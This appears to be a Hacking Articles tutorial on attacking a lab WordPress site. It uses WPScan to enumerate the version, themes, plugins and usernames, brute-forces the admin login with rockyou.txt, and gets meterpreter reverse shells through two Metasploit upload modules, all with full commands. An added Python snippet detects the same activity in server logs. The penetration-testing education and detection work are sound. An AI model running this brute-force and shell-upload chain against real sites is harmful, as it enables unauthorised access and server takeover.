WPScan: WordPress Penetration Testing Framework

Every other web application on the Internet runs on a content management system, whether WordPress, Squarespace, Joomla, or some other application still under development. Is your website one of them? In this article we will try to compromise such WordPress websites using one of the most powerful WordPress vulnerability scanners, WPScan.

Table of Contents

  • Introduction
  • Enumerating a WordPress web application
    • Version scan
    • WordPress themes
    • WordPress plugins
    • WordPress usernames
    • All in a single command
  • WordPress exploitation
    • Brute-force attack using WPScan
    • Shell upload using Metasploit
    • Vulnerable plugin exploitation
  • Scanning through a proxy server
  • Scanning with HTTP authentication enabled

Introduction

“WordPress is one of the most powerful CMS platforms, accounting for about 35% of all websites on the Internet.” So, to enumerate such web applications, we will use “WPScan”, a black-box WordPress vulnerability scanner written in Ruby that focuses on the different vulnerabilities present in a WordPress application, whether in its themes or in its plugins.

WPScan comes pre-installed on Kali Linux, SamuraiWTF, Pentoo and BlackArch; it checks its database to find outdated versions and vulnerabilities in the target web application.

Let's look at the main things WPScan can do for us:

  • Detects the version of the currently installed WordPress.
  • Can detect sensitive files such as readme files, robots.txt, database replacement files, etc.
  • Detects features enabled on the currently installed WordPress server, such as file_upload.
  • Enumerates themes and plugins with their versions, and reports whether they are outdated.
  • It even scans the web application to list the available usernames.

Before diving in, I recommend you check out our previous article, in which we discussed “Multiple Ways to Set Up a WordPress Penetration Testing Lab”.

Let's get started!!

As mentioned earlier, WPScan is installed by default on Kali Linux, so we just need to run the following command in the terminal to see the default usage options.

wpscan -hh


Scanning the Target Website's WordPress Version

Now that we have seen the default options, let's try a basic scan of the vulnerable WordPress web application we set up in our previous article.


Type the following command to scan the WordPress application and its server.

wpscan --url http://192.168.1.105/wordpress/

From the image below you can see that it dumps everything it could: the WordPress version, the Apache server version, and it even found that the upload directory has directory listing enabled, which means anyone can browse to “/wp-content/uploads” to view the uploaded files and contents.


Enumerating WordPress Themes

Themes play an important role in any CMS web application: they control the general look and feel of the website, including its page layout, widget locations, and the default font and colour preferences.

WPScan uses its database, which contains about 2600 themes, to check for vulnerable installed themes on the target.

To check the installed themes of the target's WordPress web application, type the following command:

wpscan --url http://192.168.1.105/wordpress/ -e at

The “-e” flag is used for enumeration and the “at” argument stands for “all themes”.

You can also pass other arguments, such as “vt”, to list only the vulnerable themes.

Running the above command, we are presented with the installed themes and their versions.


Enumerating WordPress Plugins

Plugins are small pieces of code that, when added to a WordPress web application, boost its functionality and enhance the website's features.

But these plugins can sometimes cause great damage to the web application because of loosely written code.

Let's check out the installed plugins on our target's web application by executing the command below:

wpscan --url http://192.168.1.105/wordpress/ -e ap

Similar to the themes, we can also list only the vulnerable plugins by passing the “vp” argument to -e.


After a few seconds, WPScan dumps the result. From the image below you can see that the plugins “mail-masta” and “reflex-gallery” are installed on our target's website. As a bonus, we also get the last update date and the latest version.


Enumerating WordPress Usernames

To list the usernames of the target website's privileged users, execute the following command:

wpscan --url http://192.168.1.105/wordpress/ -e u

The “u” argument grabs all the usernames and presents them as a list on our screen.


When WPScan completes its work, we get a list of all the users with their user IDs, in the order it grabbed them.


Enumerate ALL with a single command

Does WPScan let us scan a web application for everything in one go, whether its version, the installed themes, or the plugins?

Let's check this out!

Fire up the following command to grab everything we scanned above for our target web application.

wpscan --url http://192.168.1.105/wordpress/ -e at -e ap -e u

  • -e at: enumerate all themes of the targeted website
  • -e ap: enumerate all plugins of the targeted website
  • -e u: enumerate all usernames of the targeted website


Brute-force attack using WPScan

With the help of the usernames we enumerated earlier, we can create a wordlist of all the users and try a brute-force login attack using the default password list “rockyou.txt”. You can learn more about cracking WordPress logins here.

The image below shows our wordlist.


Let's now try to exploit the website by brute-forcing its login credentials with the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt

The -U and -P flags set the username list and the password list respectively.


It starts matching valid combinations of username and password and then dumps the result; from the image below you can see we found the login credentials.


Great!! We got the admin credentials as “admin : jessica”. Let's try to get into the application's dashboard with them.

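As an added, defender-side example (not part of the original article): the username enumeration (-e u) and the -U/-P brute force shown above, like the uploads directory listing noted during the version scan, leave characteristic traces in the web server's access log. The Python below runs over constructed sample log lines and flags author-ID and REST-API user enumeration, repeated POSTs to wp-login.php, and a served uploads directory; the IPs, the User-Agent string and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" log format; the last quoted field is the User-Agent
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
LOGIN_THRESHOLD = 10  # POSTs to wp-login.php from one IP before flagging (assumed tuning value)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines):
    """Return {ip: set(findings)} for source IPs showing WPScan-style activity."""
    findings, login_posts = defaultdict(set), defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, ua = rec["ip"], rec["path"], rec["ua"]
        if ua.startswith("WPScan"):             # default UA announces itself; trivially spoofed, weak signal
            findings[ip].add("wpscan-user-agent")
        if re.search(r"[?&]author=\d+", path):  # /?author=N author-ID enumeration (-e u)
            findings[ip].add("author-enumeration")
        if "/wp-json/wp/v2/users" in path:      # REST users endpoint also leaks login names
            findings[ip].add("rest-user-enumeration")
        if rec["method"] == "POST" and path.endswith("wp-login.php"):
            login_posts[ip] += 1                # credential brute force (-U/-P) hammers the login form
            if login_posts[ip] >= LOGIN_THRESHOLD:
                findings[ip].add("login-brute-force")
        if rec["status"] == "200" and path.rstrip("/").endswith("/wp-content/uploads"):
            findings[ip].add("uploads-directory-listing")  # bare uploads dir served = listing enabled
    return dict(findings)

# Constructed sample log: one scanner source (10.0.0.7) and one ordinary visitor (192.0.2.5)
UA = "WPScan v3.8.22 (https://wpscan.org/)"  # constructed, modelled on WPScan's default User-Agent
SAMPLE_LOG = [
    f'10.0.0.7 - - [10/Jan/2024:10:00:00 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0 "-" "{UA}"',
    f'10.0.0.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wordpress/wp-json/wp/v2/users/ HTTP/1.1" 200 412 "-" "{UA}"',
    f'10.0.0.7 - - [10/Jan/2024:10:00:02 +0000] "GET /wordpress/wp-content/uploads/ HTTP/1.1" 200 1543 "-" "{UA}"',
] + [
    f'10.0.0.7 - - [10/Jan/2024:10:01:{i:02d} +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3200 "-" "{UA}"'
    for i in range(12)
] + [
    '192.0.2.5 - - [10/Jan/2024:10:05:00 +0000] "GET /wordpress/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
]
```

Calling analyse(SAMPLE_LOG) reports all five findings for 10.0.0.7 and nothing for the ordinary visitor; in production the login counter should be windowed by time rather than a plain total.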

Shell Upload using Metasploit

Wouldn't it be great to get a shell on the target?

Run the following commands to get a meterpreter session on our target's web application.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Finally, it gives us a meterpreter session on the web server.


Vulnerable Plugin Exploitation

On our website we found a vulnerable plugin, “slideshowgallery”, which contains an authenticated file upload vulnerability. To exploit it, we will use the following module, which gives us a reverse shell.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > set rhosts 192.168.1.105
msf exploit(wp_slideshowgallery_upload) > set targeturi /wordpress
msf exploit(wp_slideshowgallery_upload) > set username admin
msf exploit(wp_slideshowgallery_upload) > set password jessica
msf exploit(wp_slideshowgallery_upload) > exploit

From the image below you can see that we have successfully captured our target's meterpreter session.


Scanning through a Proxy Server

Is it possible to scan a WordPress web application running behind a proxy server?

Many web applications use a proxy server for security, but WPScan gives us the advantage of scanning such web applications with the “--proxy” flag.

Let's see how:

Our WordPress web application is now running behind a proxy server on port 3128. You can learn more about setting up a proxy server here.


Now, if we try to scan it with the default options, we get an error and the scan stops. So let's try scanning the web application through the proxy port.

Simply run the following command to get past this proxy server:

wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128

From the image below you can see that we are back to scanning.


Scanning with HTTP Authentication Enabled

Many websites enable HTTP authentication so that some basic and critical information can be hidden from unauthenticated users.

We have set up similar authentication on our website, with the credentials “raj:123”. To learn more about HTTP authentication, click here.


From the image below you can see that when we try a normal scan, we receive an alert: “Please provide --http-auth”.

So, after this alert, we used --http-auth and entered our credentials.

wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123

And with that, our scan is now running.


Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadget enthusiast. Contact here.
